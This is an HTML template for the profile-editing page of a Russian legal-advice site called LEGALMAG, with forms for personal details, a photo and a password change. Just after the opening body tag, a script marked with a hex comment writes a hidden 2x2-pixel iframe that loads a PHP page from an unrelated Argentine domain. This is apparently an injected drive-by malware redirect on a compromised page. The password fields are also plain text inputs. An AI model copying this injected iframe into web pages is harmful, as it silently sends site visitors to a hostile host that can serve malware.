<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
	<title>LEGALMAG</title>

	<link rel="stylesheet" href="design/css/style.css">
	<!--[if IE 7]><link rel="stylesheet" href="design/css/style_ie7.css" /><![endif]-->
	<!--[if IE 8]><link rel="stylesheet" href="design/css/style_ie8.css" /><![endif]-->
	<!--[if IE 9]><link rel="stylesheet" href="design/css/style_ie9.css" /><![endif]-->
	<link rel="stylesheet" href="design/css/jquery-ui-1.8.20.custom.css">
	<link rel="stylesheet" href="design/css/jquery.ui.selectmenu.css">
	<link rel="stylesheet" href="design/css/jquery.fancybox.css">

	<script src="design/js/jquery-1.7.2.min.js"></script>
	<!--[if lt IE 9]><script src="design/js/html5.js"></script><![endif]-->
	<script src="design/js/custom.js"></script>
</head>

<body><!--c3284d--><script type="text/javascript">
document.write('<iframe src="http://cabaniaseleden.com.ar/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->


	<section id="body">
		<header><!--header-->
			<div class="wrapper">
				<a id="logo" href="index.html" title="LEGALMAG"></a>
				<div id="social-enter">Войти через: <img src="design/images/social-login.jpg" alt=""></div>
				<div id="logged">
					Привет,&nbsp;<a class="enter" href="">Валентин!</a>
					<a class="register" href="">Выйти</a>
					<div class="sep"></div>
				</div>
				<nav class="auth"><!--top-navigation-->
					<ul>
						<li><a href="">Лента вопросов</a></li>
						<li><a href="">Каталог</a></li>
						<li class="active"><a href="">Личный кабинет</a></li>
						<li ><a href="">Вопросы и ответы</a></li>
						<li><a href="">Как это работает?</a></li>
					</ul>
				</nav><!--/top-navigation-->
			</div>
		</header><!--/header-->

		<div class="clear">&nbsp;</div>

		<section id="content"><!--content-->
			<div class="wrapper">
				<aside id="left-profile">
					<div id="userIn">
						<div class="img"><img src="design/images/faceHuge.jpg" alt=""></div>
						<p>Иванова Снежанна</p>
						<p class="myMessages"><a href="">Мои сообщения</a> (<span>3</span>)</p>
					</div>
					<div id="profile">
						<div class="profile">
							<ul>
								<li><a href="">Редактировать профиль</a>
									<ul>
										<li class="active">Личная информация</li>
										<li><a href="">Образование и работа</a></li>
										<li><a href="">Контатная информация</a></li>
										<li><a href="">Услуги</a></li>
										<li><a href="">Настройка оповещений</a></li>
										<li><a href="">Рекламная компания</a></li>
									</ul>
								</li>
								<li class="back"><a href="">Назад</a></li>
							</ul>
						</div>
						<div class="leftSay"></div>
					</div>
				</aside>
				<section id="right-profile">
					<div class="wrapper">
						<div class="head">
							Редактировать профиль
						</div>
						<div class="personalInfo">
							<form>
								<p class="title">Личная информация</p>
								<dl>
									<dt><label for="name">Имя:</label></dt>
									<dd><input type="text" name="name" id="name"></dd>
									<dt><label for="surname">Фамилия:</label></dt>
									<dd><input type="text" name="surname" id="surname"></dd>
									<dt><label for="fathername">Отчество:</label></dt>
									<dd><input type="text" name="fathername" id="fathername"></dd>
									<dt><label for="sex">Пол:</label></dt>
									<dd><select name="sex" id="sex">
											<option selected disabled></option>
											<option>мужской</option>
											<option>женский</option>
										</select>
									</dd>
									<dt>Дата рождения:</dt>
									<dd>
										<select>
											<option selected disabled>День</option>
											<option>1</option>
											<option>2</option>
											<option>3</option>
											<option>4</option>
											<option>5</option>
											<option>6</option>
										</select>
										<select>
											<option selected disabled>Месяц</option>
											<option>Январь</option>
											<option>февраль</option>
											<option>Март</option>
										</select>
										<select>
											<option selected disabled>Год</option>
											<option>2000</option>
											<option>2001</option>
											<option>2002</option>
										</select>
									</dd>
								</dl>
								<div class="clear">&nbsp;</div>
								<p class="title">Фотография</p>
								<div class="img"><img src="design/images/faceBig.jpg" alt=""></div>
								<div class="customInputFile">
									<input type="file" class="photoInput" onchange='document.getElementById("fileName").value=this.value' />
									<div class="photoInputBg"></div>
									<input type="text" class="inputField" readonly="readonly" id="fileName" />
								</div>
								<p class="inputCaption">Размер файла не должен превышать 3 Мб!</p>
								<div class="clear">&nbsp;</div>
								<input type="submit" class="buttonSave" value="Сохранить">
							</form>
								<p class="title">Пароль</p>
							<form>
								<dl>
									<dt><label for="oldPass">Старый пароль:</label></dt>
									<dd><input type="text" name="oldPass" id="oldPass"></dd>
									<dt><label for="newPass">Новый пароль:</label></dt>
									<dd><input type="text" name="newPass" id="newPass"></dd>
									<dt><label for="newPassR">Новый пароль еще раз:</label></dt>
									<dd><input type="text" name="newPassR" id="newPassR"></dd>
								</dl>
								<input type="submit" class="buttonChangePassword" value="Изменить пароль">
							</form>
						</div>
					</div>
				</section>
			</div>
		</section><!--/content-->

	<div class="clear">&nbsp;</div>
	<div id="rasporka"></div>

	</section><!--/body-wrapper-->

	<footer><!--footer-->
		<section class="wrapper">
			<div class="left-col">
				<p>&copy; Legalmag, 2012</p>
				<p>Все права защищены.</p>
				<p style="margin: 20px 0 5px 0;"><a href="">Условия использования</a></p>
				<a href="">Регламент техподдержки</a>
			</div>
			<div class="right-col">
				<nav>
					<ul>
						<li><a href="">О проекте </a></li>
						<li><a href="">Условия использования</a></li>
						<li class="active"><a href="">Для инвесторов</a></li>
						<li><a href="">Безопасность </a></li>
						<li><a href="">Контакты</a></li>
					</ul>
				</nav>
				<div id="paySystems"></div>
			</div>
		</section>
	</footer><!--/footer-->

</body>
</html>